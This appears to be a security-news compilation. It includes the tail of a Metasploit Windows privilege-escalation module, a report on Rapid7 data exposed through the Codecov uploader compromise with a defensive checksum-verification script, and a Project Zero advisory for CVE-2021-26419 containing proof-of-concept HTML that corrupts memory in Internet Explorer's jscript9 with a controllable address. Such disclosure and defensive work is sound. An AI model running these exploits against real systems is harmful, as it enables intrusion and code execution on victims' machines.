    if datastore['METHOD'] =~ /DLL/i
      launch_dll_trigger
      print_status('Note that the System Orchestrator service which loads the overwritten DLL when using the DLL method can take up to 10 minutes to trigger and receive a shell.')
    end
    print_good('Enjoy the shell!')
  end

  def validate_active_host
    print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
  rescue Rex::Post::Meterpreter::RequestError => e
    elog('Could not connect to session', error: e)
    raise Msf::Exploit::Failed, 'Could not connect to session'
  end

  def validate_payload
    vprint_status("Target Arch = #{sysinfo['Architecture']}")
    vprint_status("Payload Arch = #{payload.arch.first}")
    unless payload.arch.first == sysinfo['Architecture']
      fail_with(Failure::NoTarget, 'Payload arch must match target arch')
    end
  end

  def check
    sysinfo_value = sysinfo['OS']
    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)
    if build_num.nil?
      return CheckCode::Unknown("Couldn't retrieve the target's build number!")
    else
      vprint_status("Target's build number: #{build_num}")
      build_num = build_num[0].to_i
    end
    vprint_status("Build Number = #{build_num}")

    if datastore['METHOD'] =~ /service/i
      # Service method has been tested on Windows 7, 8 and 10 (1803 and earlier)
      return Exploit::CheckCode::Appears if (build_num >= 7600 && build_num <= 17134)
    elsif (sysinfo_value =~ /10/ && build_num >= 15063 && build_num <= 17134)
      # DLL method has been tested on Windows 10 (1703 to 1803)
      return Exploit::CheckCode::Appears
    elsif (datastore['METHOD'] =~ /dll/i && build_num >= 7600 && build_num < 15063)
      print_error("The current target is not vulnerable to the DLL hijacking technique. Please try setting METHOD to 'SERVICE' and then try again!")
    end
    Exploit::CheckCode::Safe
  end
end
```

    Source
  24. Rapid7 has disclosed the compromise of customer data and partial source code due to the Codecov supply chain attack.

On Thursday, the cybersecurity firm said it was one of the victims of the incident, in which an attacker obtained access to the Codecov Bash uploader script.

The cyberattack against Codecov took place on or around January 31, 2021, and was made public on April 15. The organization, which provides code coverage and testing tools, said that a threat actor tampered with the Bash uploader script, thereby compromising the Codecov-actions uploader for GitHub, Codecov CircleCI Orb, and the Codecov Bitrise Step. This enabled attackers to export data contained in user continuous integration (CI) environments.

Hundreds of clients were potentially impacted, and now, Rapid7 has confirmed that the company was one of them.

Rapid7 says the Bash uploader was used in a limited fashion as it was only set up on a single CI server used to test and build tooling internally for the Managed Detection and Response (MDR) service. As such, the attacker was kept away from product code, but they were able to access a "small subset of source code repositories" for MDR, internal credentials -- all of which have now been rotated -- and alert-related data for some MDR customers.

Rapid7 has reached out to customers impacted by the data breach. The company pulled in cyberforensics assistance and, following an investigation, has concluded that no other corporate systems or production environments were compromised.

Codecov has since removed the unauthorized actor from its systems and is setting up monitoring and auditing tools to try and prevent another supply chain attack from occurring in the future. Impacted customers were notified via email addresses on record and through the Codecov app.

Codecov recommends that users of the Bash uploaders between January 31, 2021, and April 1, 2021, who did not perform a checksum validation should re-roll their credentials out of caution.

Via zdnet.com
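The checksum validation Codecov refers to above amounts to refusing to execute a fetched CI helper script unless its hash matches a value pinned in the pipeline. The following is an added example, not Codecov's or Rapid7's code, of such a gate as a POSIX shell function; the stand-in uploader, the pinned hash derived from it and the tampered copy are all constructed inline, and sha256sum or shasum is assumed to be installed.

```shell
#!/bin/sh
# Added example (not Codecov's or Rapid7's code): run a downloaded CI helper
# script only when its SHA-256 matches a hash pinned in the pipeline config.
# Assumptions: sha256sum (GNU) or shasum (BSD/macOS) is on PATH; the pinned
# hash is supplied by the caller from a checked-in file or protected CI variable.
set -u

# Print the SHA-256 of a file, portable across GNU coreutils and BSD/macOS.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_and_run FILE EXPECTED_SHA256
# Executes FILE only when its hash equals EXPECTED_SHA256; returns 1 without
# executing anything when the file is missing or the hash differs.
verify_and_run() {
    file=$1
    expected=$2
    [ -f "$file" ] || { echo "missing: $file" >&2; return 1; }
    actual=$(sha256_of "$file")
    if [ "$actual" != "$expected" ]; then
        echo "checksum mismatch for $file" >&2
        echo "  expected: $expected" >&2
        echo "  actual:   $actual" >&2
        return 1
    fi
    sh "$file"
}

# Constructed demo data: a stand-in uploader, the hash a pipeline would pin
# for it, and a copy with one extra line appended (the tampering scenario).
demo_dir=$(mktemp -d)
printf '%s\n' '#!/bin/sh' 'echo "uploading coverage (stand-in)"' > "$demo_dir/uploader.sh"
PINNED_SHA256=$(sha256_of "$demo_dir/uploader.sh")
cp "$demo_dir/uploader.sh" "$demo_dir/tampered.sh"
echo 'echo "extra line that was not in the pinned version"' >> "$demo_dir/tampered.sh"

# The pristine copy runs; the modified copy is refused before any line executes.
verify_and_run "$demo_dir/uploader.sh" "$PINNED_SHA256"
verify_and_run "$demo_dir/tampered.sh" "$PINNED_SHA256" || echo "refused tampered copy"
```

In a real pipeline the pinned hash must come from somewhere the attacker who controls the download host cannot also edit, otherwise the check proves nothing.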
  25. There is a vulnerability in jscript9 that could be potentially used by an attacker to execute arbitrary code when viewing an attacker-controlled website in Internet Explorer. The vulnerability has been confirmed on Windows 10 64-bit with the latest security patches applied.

Internet Explorer: Memory corruption in jscript9.dll related to scope of the arguments object

The following minimal sample is sufficient to trigger the bug:

############################################################
<!-- saved from url=(0014)about:internet -->
<script>
function main() {
  function v4(v5,v6) {
    with ({}) {
      arguments();
    }
  }
  for(var i=0; i <1; i++) v4(1);
}
alert('start');
main();
alert('end');
</script>
############################################################

When this sample is opened with Internet Explorer, it crashes inside jscript9!Js::JavascriptFunction::CallFunction<1> when dereferencing memory pointed to by eax.

jscript9!Js::JavascriptFunction::CallFunction<1>+0x39:
68c2d6e9 8bb850020000 mov edi,dword ptr [eax+250h] ds:002b:00000250=????????

At first glance, it might look like a null pointer dereference; however, the value of eax in this case was read from uninitialized memory. There are also different ways to trigger the crash when accessing the arguments object.
The following sample demonstrates a crash when reading from a controllable address:

############################################################
<!-- saved from url=(0014)about:internet -->
<script>
function test() {
  test.caller.arguments.length = (0x13371337>>1);
}
function main() {
  function v4(v5,v6) {
    test();
    with ({}) {
      arguments.length;
      arguments();
    }
  }
  for(var i=0; i <1; i++) v4(1);
}
alert('start');
main();
alert('end');
</script>
############################################################

This sample crashes in Js::JavascriptOperators::GetProperty_Internal when dereferencing address 0x13371337+40h:

jscript9!Js::JavascriptOperators::GetProperty_Internal<0>+0x35:
68b578b5 8b7840 mov edi,dword ptr [eax+40h] ds:002b:13371377=????????

The value read this way is used as a function pointer, thus demonstrating the vulnerability could be used for code execution.

I haven't done the full root cause analysis (it will be easier to do with proper debug tooling for jscript9), but in both cases, the operations on 'arguments' object end up being performed on incorrect data. I suspect this is related to changing the scope, e.g. accessing an object at an incorrect stack slot due to scope change. Another possibility could be an incorrectly initialized arguments object or the corresponding local variable.

Full debug log:

############################################################
(1654.14e8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=13371337 ebx=0910bbe0 ecx=0910bbe0 edx=0910bbe0 esi=092b8240 edi=00000000
eip=68b578b5 esp=053bc578 ebp=053bc590 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
jscript9!Js::JavascriptOperators::GetProperty_Internal<0>+0x35:
68b578b5 8b7840 mov edi,dword ptr [eax+40h] ds:002b:13371377=????????

0:009> k
 # ChildEBP RetAddr
00 053bc590 68b69075 jscript9!Js::JavascriptOperators::GetProperty_Internal<0>+0x35
01 053bc5dc 68b9d19d jscript9!Js::InterpreterStackFrame::OP_ProfiledLdLen<Js::OpLayoutReg2_OneByte>+0x1f5
02 053bc608 68b9c102 jscript9!Js::InterpreterStackFrame::Process+0x7fd
03 053bc744 0b9a0fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x242
WARNING: Frame IP not in any known module. Following frames may be wrong.
04 053bc750 68c2d743 0xb9a0fd9
05 053bc798 68b9ff61 jscript9!Js::JavascriptFunction::CallFunction<1>+0x93
06 053bc7c8 68b9cb53 jscript9!Js::InterpreterStackFrame::OP_ProfiledCallI<Js::OpLayoutCallI_OneByte>+0x121
07 053bc7f8 68b9c102 jscript9!Js::InterpreterStackFrame::Process+0x1b3
08 053bc934 0b9a0fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x242
09 053bc940 68c2d743 0xb9a0fe1
0a 053bc988 68b9ff61 jscript9!Js::JavascriptFunction::CallFunction<1>+0x93
0b 053bc9b8 68b9cb53 jscript9!Js::InterpreterStackFrame::OP_ProfiledCallI<Js::OpLayoutCallI_OneByte>+0x121
0c 053bc9e8 68b9c102 jscript9!Js::InterpreterStackFrame::Process+0x1b3
0d 053bcb14 0b9a0fe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x242
0e 053bcb20 68c2d743 0xb9a0fe9
0f 053bcb60 68b4eca9 jscript9!Js::JavascriptFunction::CallFunction<1>+0x93
10 053bcbd4 68b4ebbc jscript9!Js::JavascriptFunction::CallRootFunctionInternal+0xb5
11 053bcc2c 68b4eb56 jscript9!Js::JavascriptFunction::CallRootFunction+0x4d
12 053bcc74 68b4eabd jscript9!ScriptSite::CallRootFunction+0x42
13 053bccb0 68b5256e jscript9!ScriptSite::Execute+0xae
14 053bcd48 68b4e9aa jscript9!ScriptEngine::ExecutePendingScripts+0x1bf
15 053bcde0 68c27cca jscript9!ScriptEngine::ParseScriptTextCore+0x32c
16 053bce30 695a9cc1 jscript9!ScriptEngine::ParseScriptText+0x5a
17 053bce68 694a0493 MSHTML!InitializeLocalHtmlEngine+0x1f11
18 053bcec0 694b7fe7 MSHTML!GetWebPlatformObject+0x16c93
19 053bcf30 694b8493 MSHTML!GetWebPlatformObject+0x2e7e7
1a 053bd01c 694b87be MSHTML!GetWebPlatformObject+0x2ec93
1b 053bd098 694b8146 MSHTML!GetWebPlatformObject+0x2efbe
1c 053bd0b8 694d79d9 MSHTML!GetWebPlatformObject+0x2e946
1d 053bd110 694d6bb9 MSHTML!UninitializeLocalHtmlEngine+0x8b49
1e 053bd134 694d653e MSHTML!UninitializeLocalHtmlEngine+0x7d29
1f 053bd25c 695d4891 MSHTML!UninitializeLocalHtmlEngine+0x76ae
20 053bd27c 695d47fb MSHTML!DllGetClassObject+0x7291
21 053bd29c 695d478d MSHTML!DllGetClassObject+0x71fb
22 053bd2e8 695d46a7 MSHTML!DllGetClassObject+0x718d
23 053bd300 6950dccc MSHTML!DllGetClassObject+0x70a7
24 053bd378 6967d357 MSHTML!TravelLogCreateInstance+0x25cec
25 053bd3c8 69510f32 MSHTML!DllCanUnloadNow+0x13957
26 053bd3e4 76d0ef5b MSHTML!TravelLogCreateInstance+0x28f52
27 053bd410 76d05eca USER32!_InternalCallWinProc+0x2b
28 053bd4f4 76d03c3a USER32!UserCallWinProcCheckWow+0x33a
29 053bd568 76d03a00 USER32!DispatchMessageWorker+0x22a
2a 053bd574 6ad32cd4 USER32!DispatchMessageW+0x10
2b 053bf720 6ad31db3 IEFRAME!Ordinal245+0x1cb4
2c 053bf7e0 6a5bcb2c IEFRAME!Ordinal245+0xd93
2d 053bf7f8 731e26ed msIso+0x1cb2c
2e 053bf830 756cfa29 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d
2f 053bf840 770676b4 KERNEL32!BaseThreadInitThunk+0x19
30 053bf89c 77067684 ntdll!RtlGetAppContainerNamedObjectPath+0xe4
31 053bf8ac 00000000 ntdll!RtlGetAppContainerNamedObjectPath+0xb4
############################################################

This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will become visible to the public. The scheduled disclosure date is 2021-05-13. Disclosure at an earlier date is possible if agreed upon by all parties.

Related CVE Numbers: CVE-2021-26419.

Found by: ifratric@google.com

Source